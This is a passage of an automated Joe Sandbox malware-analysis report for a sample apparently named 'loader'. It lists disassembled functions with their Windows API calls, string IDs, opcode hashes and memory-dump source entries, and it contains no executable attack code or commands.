              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 68c65dfda5f66051ff3c615014a503714acc526401df41ff7348ffd7f31551ba
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 68c65dfda5f66051ff3c615014a503714acc526401df41ff7348ffd7f31551ba
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              Function 0011DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9ea4c2d99a62b1a0a4e32c7997bee43f0d77287e460be8a6931d6054c3a638c4
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: 9ea4c2d99a62b1a0a4e32c7997bee43f0d77287e460be8a6931d6054c3a638c4
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              Function 0011DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2e6f1df807239cc3260b30ed9a882b3a6ee63c10cd0b545468669207eb1136f8
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: 2e6f1df807239cc3260b30ed9a882b3a6ee63c10cd0b545468669207eb1136f8
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              Function 0011DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f83ff0796f0f6b677147bd60fd9e69a4b51c7e7761b85825b7fa8f416cab6d80
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: f83ff0796f0f6b677147bd60fd9e69a4b51c7e7761b85825b7fa8f416cab6d80
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              Function 0011DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d76a3f97d3af30682b6ff692e15d67cf9e79a9a495d3db14674512c9974c3208
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: d76a3f97d3af30682b6ff692e15d67cf9e79a9a495d3db14674512c9974c3208
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              Function 0011DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: be7b9268e83b7aee8e82eeddb2b30d1fb621891f68923a5f9e173cbdbf1ec7e8
              • Instruction ID: c0c62fa6efdf64fb9289846fec22cd2d5c856be8340e0bc11e7d5e3cb7f60936
              • Opcode Fuzzy Hash: be7b9268e83b7aee8e82eeddb2b30d1fb621891f68923a5f9e173cbdbf1ec7e8
              • Instruction Fuzzy Hash: 40A001AA6AD203BCF10C62557D56EBA022CC4D5B617718D3EB60AA4091AB806D8A9871
              Function 0011DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 04d926ed21722840ba70b37e191758ef23d5143b461e0e8e7e7e0641e8926a5d
              • Instruction ID: c0c62fa6efdf64fb9289846fec22cd2d5c856be8340e0bc11e7d5e3cb7f60936
              • Opcode Fuzzy Hash: 04d926ed21722840ba70b37e191758ef23d5143b461e0e8e7e7e0641e8926a5d
              • Instruction Fuzzy Hash: 40A001AA6AD203BCF10C62557D56EBA022CC4D5B617718D3EB60AA4091AB806D8A9871
              Function 00109EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
              Download Yara Rule
              APIs
              • SetEndOfFile.KERNELBASE(?,00109104,?,?,-00001964), ref: 00109EC2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File
              • String ID:
              • API String ID: 749574446-0
              • Opcode ID: ccd22a198fa3d12fed8a82a5718f24e2810e41aeecefa8f76f76b8422d469fbb
              • Instruction ID: b0775eda0b94c1926f198cfec9c87aa986e3e0a77cc34aa71785cc7f1f4675af
              • Opcode Fuzzy Hash: ccd22a198fa3d12fed8a82a5718f24e2810e41aeecefa8f76f76b8422d469fbb
              • Instruction Fuzzy Hash: 2EB011300A800A8ACE002B30CE088283A20EB2230A30082A0B022CA0A0CB22C002AA00
              Function 0011A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,0011A587,C:\Users\user\Desktop,00000000,0014946A,00000006), ref: 0011A326
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 5e8ef741bfc08589b419cf0e277df2971565f497942ab9c4bc3996ba963482c2
              • Instruction ID: 4d48abf0dff1d5c221c4018b9092082fb39c1c2643395af53a901bf6aef29ea1
              • Opcode Fuzzy Hash: 5e8ef741bfc08589b419cf0e277df2971565f497942ab9c4bc3996ba963482c2
              • Instruction Fuzzy Hash: 04A0123019400656CA000B30CC09C1576505760703F0086207002C00A0CB308854A504
              Function 001096D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • CloseHandle.KERNELBASE(000000FF,?,?,0010968F,?,?,?,?,00131FA1,000000FF), ref: 001096EB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: 5b2722ba5a7ea47b7b35f066984f6ecb3d8a470813513b853a6f8f5d15e8e678
              • Instruction ID: 7feeafae900aa20d5cbe9a4d08d88d552fc4ed50389fff256f383de444853a08
              • Opcode Fuzzy Hash: 5b2722ba5a7ea47b7b35f066984f6ecb3d8a470813513b853a6f8f5d15e8e678
              • Instruction Fuzzy Hash: EAF08271556B148FDB308A24D5B8792B7E49B16735F048B1ED1FB438E1D7B6688D8F00

              Non-executed Functions

              Function 0011B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0011B971
              • EndDialog.USER32(?,00000006), ref: 0011B984
              • GetDlgItem.USER32(?,0000006C), ref: 0011B9A0
              • SetFocus.USER32(00000000), ref: 0011B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0011B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0011BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 0011BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0011BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0011BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0011BA94
              • _swprintf.LIBCMT ref: 0011BAC4
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0011BAD7
              • FindClose.KERNEL32(00000000), ref: 0011BADE
              • _swprintf.LIBCMT ref: 0011BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0011BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0011BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0011BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0011BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0011BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0011BBC9
              • _swprintf.LIBCMT ref: 0011BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0011BC08
              • _swprintf.LIBCMT ref: 0011BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0011BC6F
                • Part of subcall function 0011A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0011A662
                • Part of subcall function 0011A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0013E600,?,?), ref: 0011A6B1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: 57ef432a1c113f5511300c0abae43dc45e94a8c5d1651ed5fcfa6ba372e706bd
              • Instruction ID: 9fe9effd722e57b8aa677c3ff1ee5909e78ba5443e7bccb9cdd5d949511fd283
              • Opcode Fuzzy Hash: 57ef432a1c113f5511300c0abae43dc45e94a8c5d1651ed5fcfa6ba372e706bd
              • Instruction Fuzzy Hash: 2D91B4B2248348BBD2359BA0DC89FFB77ACEB4A704F040829F789D2481D775A6458762
              Function 0010718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00107191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001072F1
              • CloseHandle.KERNEL32(00000000), ref: 00107301
                • Part of subcall function 00107BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00107C04
                • Part of subcall function 00107BF5: GetLastError.KERNEL32 ref: 00107C4A
                • Part of subcall function 00107BF5: CloseHandle.KERNEL32(?), ref: 00107C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0010730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0010741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00107446
              • CloseHandle.KERNEL32(?), ref: 00107457
              • GetLastError.KERNEL32 ref: 00107467
              • RemoveDirectoryW.KERNEL32(?), ref: 001074B3
              • DeleteFileW.KERNEL32(?), ref: 001074DB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: a60cd7aa4bfb2cb99a48b5794f9775d4c4d80296db141596d1e6d1d2c7a80ddf
              • Instruction ID: 315b63417f17704473b7fdae484e253c1e0ba2a4e0ee58c296296b94d6067af8
              • Opcode Fuzzy Hash: a60cd7aa4bfb2cb99a48b5794f9775d4c4d80296db141596d1e6d1d2c7a80ddf
              • Instruction Fuzzy Hash: B5B1E271D04215ABDF25DBA0DC81BEE77B8BF14300F004469F999E71C2D7B4AA89CBA0
              Function 00103281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID: CMT$h%u$hc%u
              • API String ID: 3004599000-3282847064
              • Opcode ID: 8cad8b500298c7ed63a39881906c43fd8dd74df968cf33c772ccf8c791abc308
              • Instruction ID: f888b42151ce8c649acdbdbdf8d4a6be70085a7297d0ebb244eca91d955f5fd6
              • Opcode Fuzzy Hash: 8cad8b500298c7ed63a39881906c43fd8dd74df968cf33c772ccf8c791abc308
              • Instruction Fuzzy Hash: 6632A5716102849FDF14DF64C895AEA37A9AF24300F04457EFDDACB2C2DBB49A49CB60
              Function 0012D00E Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$^PpL
              • API String ID: 4168288129-1628670806
              • Opcode ID: 0c06fa0bc50813f86374d5cb927fef2c5bbb38bf313622cf18de84c8c9365f84
              • Instruction ID: 7a44b3cc32f7b6696281e405220ef886d6c0c10b195f9792f2dc0f8950f83126
              • Opcode Fuzzy Hash: 0c06fa0bc50813f86374d5cb927fef2c5bbb38bf313622cf18de84c8c9365f84
              • Instruction Fuzzy Hash: 55C23A72E086288FDB29CE28ED407EAB7B5FB45315F1541EAD84DE7240E774AE918F40
              Function 001027E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 001027F1
              • _strlen.LIBCMT ref: 00102D7F
                • Part of subcall function 0011137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0010B652,00000000,?,?,?,0001040A), ref: 00111396
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00102EE0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
